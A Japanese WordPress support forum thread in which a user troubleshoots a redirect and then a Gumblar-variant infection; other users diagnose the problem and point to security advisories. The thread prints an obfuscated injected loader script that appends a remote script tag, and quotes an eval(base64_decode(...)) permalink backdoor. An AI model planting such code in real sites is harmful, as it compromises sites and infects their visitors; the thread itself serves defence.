サポート » その他 » ハッキングされてしまいました

  • 解決済 aoyama

    (@aoyama)


    http://news.zarathustra-wins.net/
    にアクセスするとhttp://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/routeに飛ばされてしまいます。
    このサイトは調べてみると日本のJAFに相当する組織だそうで営利企業ではないようですので目的が不明です。

    jp.techcrunch.comに

    警告! WordPress旧版は簡単に乗っ取られる―即刻アップデートを
    まず、パーマリンクに奇妙なコードが付加されている。たとえば、
    example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.
    キーワードは“eval”と“base64_decode”だ。
    第2に、「隠されたバックドアー」に注意すること。不審な管理者が設定されていないかチェックする。“Administrator (2)”や見慣れない名前の管理者が登録されていないか調べること。

    このような事実はなく、最新版にアップロードしているのですが。

7件の返信を表示中 - 1 - 7件目 (全7件中)
  • 本文に meta refresh がそのまま書かれていますね。

    <meta http-equiv=”Refresh” content=”2;URL=http://www.aaa.net/”>

    HTMLエスケープしてください。

    トピック投稿者 aoyama

    (@aoyama)

    php-web様、早速返信ありがとうございます。
    何とか解決いたしました。
    ありがとうございました。

    モデレーター JOTAKI, Taisuke

    (@tai)

    ??? クラッキング(ハッキングではなく)されたわけではなかったということですよね?

    タイトルに釣られてこのスレッドを見る方がたくさんいると思うので、そこははっきり書いといてください。

    トピック投稿者 aoyama

    (@aoyama)

    アクセスすると白紙になりソースがこんなになってしまった。

    <script>/*GNU GPL*/ try{window.onload = function(){var K5bd3jok3ve = document.createElement('s&c@^)$r^)!i(p(t)@('.replace(/@|\$|&|\!|#|\^|\)|\(/ig, ''));K5bd3jok3ve.setAttribute('type', 'text/javascript');K5bd3jok3ve.setAttribute('src',  'h(!t)&^t#@(p#&&:)!$!/$(#!/^)!v$e&@(&r!i#(z))o$$n$(-#!)n(e^(#t^.(#($m((!$i$c!^r^($o#^s!^o(&@@f($$@t$)&@.$c)o!$m$@#.@)c)#)!)h$i))p$@-
    
    (略)
    
    ''));K5bd3jok3ve.setAttribute('defer', 'defer');K5bd3jok3ve.setAttribute('id', 'C@@#o@&y@#3(y)$^^7@(($7!^&t!t)!q)(5!'.replace(/#|\!|\(|@|\$|\)|&|\^/ig, ''));document.body.appendChild(K5bd3jok3ve);}} catch(e) {}</script>

    これは一見すると、いわゆる「トロイの木馬」(Trojan)ですよね。

    このままですと、このフォーラムが怪しいスクリプト配信サイトになってしまいます。早急に削除してください。

    あと、大事なことなので強くお願いしますが、本文にスクリプトを書く場合は、逆クォートで囲ってください!!

    よろしくお願いします。

    Sophos /*CODE1*/や/*GNU GPL*/などObfuscated Scriptsを用いる、JR東日本のサイト改竄などの「Gumblar」亜種をトロイの木馬「Troj/JSRedir-AK」として12月22日より検知開始しています。 http://bit.ly/60wCUn

    Gumblar亜種、Wordpress、Drupal、JoomlaなどのPHPを用いたブログツールを改竄している模様 http://bit.ly/4q38uZ

    緊急 WordPress Woopra Analytics Plugin Arbitrary File Creation Vulnerability http://bit.ly/7zue7v

    詳しくは、「JR東日本サイト改竄などの「Gumblar」亜種に関する情報共有」 http://bit.ly/5p9YNP

    これがないと何を言っているのか、わからない恐れがあった

    What to do when your blog gets injected with a malicious script, worm and infects WordPress
    http://programmingkid.com/2009/12/malicious-code-infect-wordpress-blog/

7件の返信を表示中 - 1 - 7件目 (全7件中)
  • トピック「ハッキングされてしまいました」には新たに返信することはできません。